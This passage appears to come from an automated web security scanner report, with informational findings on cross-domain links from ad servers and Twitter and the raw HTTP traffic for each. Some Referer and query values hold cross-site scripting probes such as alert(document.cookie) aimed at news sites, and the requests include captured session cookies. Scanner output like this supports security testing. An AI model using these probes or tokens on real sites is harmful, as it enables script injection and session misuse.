</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.250. http://smm.sitescout.com/disp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smm.sitescout.com
Path:   /disp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /disp?pid=79C8ECB&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D853584%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000101%2C1220000101%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D69%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woBADYAAHrQ5V4AAACH%7E010411%3Bp%3D6%3Bf%3D990638%3Bh%3D922865%3Bk%3Dhttp%3A%2F%2Fhpi.rotator.hadj7.adjuggler.net%2Fservlet%2Fajrotator%2F63722%2F0%2Fcj%2FV127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016%2F&rand=85624985 HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
SAdBuild: 400
P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 1266
Date: Fri, 28 Jan 2011 14:14:37 GMT
Connection: close


<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="Tue, 01 Jan 2000 12:12:12 GMT">

...[SNIP]...
%3Dhttp%3A%2F%2Fhpi.rotator.hadj7.adjuggler.net%2Fservlet%2Fajrotator%2F63722%2F0%2Fcj%2FV127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016%2F" target="_blank">
<img src="http://smm.sitescout.netdna-cdn.com/300x250_lady31-1837a12.gif" alt="" border="0">
</a>
...[SNIP]...

17.251. http://smm.sitescout.com/disp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smm.sitescout.com
Path:   /disp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /disp?pid=52AF2E4&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D882519%3Bx%3D3584%3Bg%3D172%3Bc%3D1220000167%2C1220000167%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D126%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woBADYAAHrQ5V4AAACH%7E010411%3Bp%3D6%3Bf%3D1075159%3Bh%3D922865%3Bk%3Dhttp%3A%2F%2Fhpi.rotator.hadj7.adjuggler.net%2Fservlet%2Fajrotator%2F63723%2F0%2Fcj%2FV12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E%2F&rand=54969238 HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
SAdBuild: 400
P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 1265
Date: Fri, 28 Jan 2011 14:48:34 GMT
Connection: close


<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="Tue, 01 Jan 2000 12:12:12 GMT">

...[SNIP]...
%3Dhttp%3A%2F%2Fhpi.rotator.hadj7.adjuggler.net%2Fservlet%2Fajrotator%2F63723%2F0%2Fcj%2FV12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E%2F" target="_blank">
<img src="http://smm.sitescout.netdna-cdn.com/local-728-2-e6c798f.gif" alt="" border="0">
</a>
...[SNIP]...

17.252. http://tag.contextweb.com/TAGPUBLISH/getad.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TAGPUBLISH/getad.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /TAGPUBLISH/getad.aspx?tagver=1&cd=1&if=0&ca=VIEWAD&cp=513102&ct=50151&cf=300X250&cn=1&rq=1&fldc=5&dw=1036&cwu=http%3A%2F%2Fevents.cbs6albany.com%2F%3F376e5%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ea7771aeaee3%3D1&mrnd=63109582 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB23
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2094
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Fri, 28 Jan 2011 17:37:49 GMT
Connection: close
Set-Cookie: V=gFEcJzqCjXJj; domain=.contextweb.com; expires=Sat, 28-Jan-2012 17:37:48 GMT; path=/
Set-Cookie: 513102_300X250_50151=1/28/2011 12:37:49 PM; domain=.contextweb.com; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Sat, 29-Jan-2011 05:00:00 GMT; path=/

var strCreative=''
+ '<script language="javascript" type="text/javascript"> \n'
+ ' document.write(\'<script type="text/javascript" language="javascript" src="http://optimized-by.rubiconproject.co
...[SNIP]...
<div style="display:none;width:0;height:0"><IFRAME SRC="http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.,513102,,,TOT09,RCQU1,RCQU9,300X250" HEIGHT="0" WIDTH="0" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO"></IFRAME>
...[SNIP]...
<noscr'+'ipt><img src="http://b.scorecardresearch.com/p?c1=8&c2=2102&c3=0&c4=&c5=&c6=&c15=&c16=TOT09%2cRCQU1%2cRCQU9&cv=2.0&cj=1" /></noscr'+'ipt>
...[SNIP]...
<div style="display:none;width:0;height:0"><img src="http://d.xp1.ru4.com/activity?_o=62795&_t=cm_cntxtweb" height="1" width="1" /><img src="http://idpix.media6degrees.com/orbserv/hbpix?pixId=5392" height="1" width="1" /><img src="http://tags.bluekai.com/site/3358?id=gFEcJzqCjXJj" height="1" width="1" /><img src="http://map.pulsemgr.com/uds/pc?ptnr=21272" height="1" width="1" /><img src="http://sync.mathtag.com/sync/img?mt_exid=11&type=sync&redir=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D530739%26ev%3D%5BMM_UUID%5D" height="1" width="1" /></div>
...[SNIP]...

17.253. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt?FirstName=%26LastName=%26Age=0&clickTag3=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000935955/cstr=44199605=_4d436292,1445734807,766161^935955^1183^0,1_/xsxdata=$xsxdata/bnum=44199605/optn=64?trg=http://www.mylife.com/privacy-policy&siteValue=0000766161\ HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 01:41:08 GMT
Location: http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e&FirstName=%26LastName=%26Age=0&clickTag3=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000935955/cstr=44199605=_4d436292,1445734807,766161%5E935955%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=44199605/optn=64&trg=http://www.mylife.com/privacy-policy&siteValue=0000766161%5C
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ac1=51f37.6292a=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111939; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B69B_0_0|c51F37:6292A_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 01:41:08 GMT
Content-Length: 527
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:08 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e&amp;FirstName=%26LastName=%26Age=0&amp;clickTag3=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000935955/cstr=44199605=_4d436292,1445734807,766161%5E935955%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=44199605/optn=64&amp;trg=http://www.mylife.com/privacy-policy&amp;siteValue=0000766161%5C">here</a>
...[SNIP]...

17.254. http://twitter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /?status=@ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:11 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234370-70445-11207
ETag: "8b22de7001b884f0909653bbc0878c1b"
Last-Modified: Fri, 28 Jan 2011 17:06:10 GMT
X-Runtime: 0.07086
Content-Type: text/html; charset=utf-8
Content-Length: 45097
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1296179758/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1296179758/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a2.twimg.com/a/1296179758/stylesheets/fronts.css?1296182903" media="screen" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<a href="/" id="logo"><img alt="Twitter" height="55" src="http://a0.twimg.com/a/1296179758/images/fronts/logo_withbird_home.png" width="224" /></a>
...[SNIP]...
<a href="/newtwitter?autoplay=true" id="video-thumb"><img alt="Video-sample-ss" height="140" src="http://a0.twimg.com/a/1296179758/images/whatsnew/video-sample-ss.png" width="200" /></a>
...[SNIP]...
<a href="/WorktoLive" class="avatar-sm" hreflang="en" id="icon_WorktoLive" rel="WorktoLive" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/490621106/Picture_2_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/WorktoLive" class="avatar" hreflang="en" target="_blank"><img alt="WorktoLive" border="0" height="48" src="http://a2.twimg.com/profile_images/490621106/Picture_2_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/JetBlueCheeps" class="avatar-sm" hreflang="en" id="icon_JetBlueCheeps" rel="JetBlueCheeps" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/295295346/avatar-squared_logo_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/JetBlueCheeps" class="avatar" hreflang="en" target="_blank"><img alt="JetBlueCheeps" border="0" height="48" src="http://a1.twimg.com/profile_images/295295346/avatar-squared_logo_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/dailygalaxy" class="avatar-sm" hreflang="en" id="icon_dailygalaxy" rel="dailygalaxy" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/648882151/app_1_4066274025_8743_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/dailygalaxy" class="avatar" hreflang="en" target="_blank"><img alt="dailygalaxy" border="0" height="48" src="http://a0.twimg.com/profile_images/648882151/app_1_4066274025_8743_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/sebastianbach" class="avatar-sm" hreflang="en" id="icon_sebastianbach" rel="sebastianbach" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/1214676495/4139926546_b76396d581_o_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/sebastianbach" class="avatar" hreflang="en" target="_blank"><img alt="sebastianbach" border="0" height="48" src="http://a1.twimg.com/profile_images/1214676495/4139926546_b76396d581_o_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/funnyordie" class="avatar-sm" hreflang="en" id="icon_funnyordie" rel="funnyordie" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/1217688159/twitter-avatar_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/funnyordie" class="avatar" hreflang="en" target="_blank"><img alt="funnyordie" border="0" height="48" src="http://a2.twimg.com/profile_images/1217688159/twitter-avatar_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/fledgling" class="avatar-sm" hreflang="en" id="icon_fledgling" rel="fledgling" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/471198711/a_rasterized_500w_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/fledgling" class="avatar" hreflang="en" target="_blank"><img alt="fledgling" border="0" height="48" src="http://a2.twimg.com/profile_images/471198711/a_rasterized_500w_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/umairh" class="avatar-sm" hreflang="en" id="icon_umairh" rel="umairh" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/129730596/2630509441_944a6ee3e2_m_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/umairh" class="avatar" hreflang="en" target="_blank"><img alt="umairh" border="0" height="48" src="http://a0.twimg.com/profile_images/129730596/2630509441_944a6ee3e2_m_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/richardbranson" class="avatar-sm" hreflang="en" id="icon_richardbranson" rel="richardbranson" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/64445726/rb_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/richardbranson" class="avatar" hreflang="en" target="_blank"><img alt="richardbranson" border="0" height="48" src="http://a1.twimg.com/profile_images/64445726/rb_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/thesulk" class="avatar-sm" hreflang="en" id="icon_thesulk" rel="thesulk" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/379256380/IMG_0913_normal.JPG" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/thesulk" class="avatar" hreflang="en" target="_blank"><img alt="thesulk" border="0" height="48" src="http://a0.twimg.com/profile_images/379256380/IMG_0913_normal.JPG" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/dickc" class="avatar-sm" hreflang="en" id="icon_dickc" rel="dickc" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/647531397/dick_profile_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/dickc" class="avatar" hreflang="en" target="_blank"><img alt="dickc" border="0" height="48" src="http://a2.twimg.com/profile_images/647531397/dick_profile_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/nytimesfashion" class="avatar-sm" hreflang="en" id="icon_nytimesfashion" rel="nytimesfashion" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/289110813/fashion_75_twitter_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/nytimesfashion" class="avatar" hreflang="en" target="_blank"><img alt="nytimesfashion" border="0" height="48" src="http://a2.twimg.com/profile_images/289110813/fashion_75_twitter_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/cnnbrk" class="avatar-sm" hreflang="en" id="icon_cnnbrk" rel="cnnbrk" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/67263363/icon.cnnbrk_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/cnnbrk" class="avatar" hreflang="en" target="_blank"><img alt="cnnbrk" border="0" height="48" src="http://a0.twimg.com/profile_images/67263363/icon.cnnbrk_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/frugaltraveler" class="avatar-sm" hreflang="en" id="icon_frugaltraveler" rel="frugaltraveler" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/951933826/Seth_SP-7004_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/frugaltraveler" class="avatar" hreflang="en" target="_blank"><img alt="frugaltraveler" border="0" height="48" src="http://a0.twimg.com/profile_images/951933826/Seth_SP-7004_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/WritersDigest" class="avatar-sm" hreflang="en" id="icon_WritersDigest" rel="WritersDigest" target="_blank"><img alt="" border="0" height="48" src="http://a3.twimg.com/profile_images/642528874/WDvert_color_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/WritersDigest" class="avatar" hreflang="en" target="_blank"><img alt="WritersDigest" border="0" height="48" src="http://a3.twimg.com/profile_images/642528874/WDvert_color_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/RealKaka" class="avatar-sm" hreflang="en" id="icon_RealKaka" rel="RealKaka" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/1196735481/230210193_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/RealKaka" class="avatar" hreflang="en" target="_blank"><img alt="RealKaka" border="0" height="48" src="http://a1.twimg.com/profile_images/1196735481/230210193_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/gourmet" class="avatar-sm" hreflang="en" id="icon_gourmet" rel="gourmet" target="_blank"><img alt="" border="0" height="48" src="http://a3.twimg.com/profile_images/1162062705/gourmet100x100_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/gourmet" class="avatar" hreflang="en" target="_blank"><img alt="gourmet" border="0" height="48" src="http://a3.twimg.com/profile_images/1162062705/gourmet100x100_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/health" class="avatar-sm" hreflang="en" id="icon_health" rel="health" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/1162063666/health_news_100x100_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/health" class="avatar" hreflang="en" target="_blank"><img alt="health" border="0" height="48" src="http://a1.twimg.com/profile_images/1162063666/health_news_100x100_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/phdinparenting" class="avatar-sm" hreflang="en" id="icon_phdinparenting" rel="phdinparenting" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/1167802841/phdinpareting-twitter-avatar2_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/phdinparenting" class="avatar" hreflang="en" target="_blank"><img alt="phdinparenting" border="0" height="48" src="http://a2.twimg.com/profile_images/1167802841/phdinpareting-twitter-avatar2_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/jdickerson" class="avatar-sm" hreflang="en" id="icon_jdickerson" rel="jdickerson" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/49246432/jdmisha_small_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/jdickerson" class="avatar" hreflang="en" target="_blank"><img alt="jdickerson" border="0" height="48" src="http://a2.twimg.com/profile_images/49246432/jdmisha_small_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/Pro_Hunt58" class="avatar-sm" hreflang="en" id="icon_Pro_Hunt58" rel="Pro_Hunt58" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/1210515005/image_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/Pro_Hunt58" class="avatar" hreflang="en" target="_blank"><img alt="Pro_Hunt58" border="0" height="48" src="http://a0.twimg.com/profile_images/1210515005/image_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
</h2>

<script src="http://a1.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

17.255. http://twitter.com/malsup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /malsup?max_id=30791740717801472&page=2&twttr=true HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:32 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225092-82342-16130
ETag: "c59b4c0b9acbb0f08a369771fe895640"
Last-Modified: Fri, 28 Jan 2011 14:31:32 GMT
X-Runtime: 0.58927
Content-Type: text/html; charset=utf-8
Content-Length: 49556
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
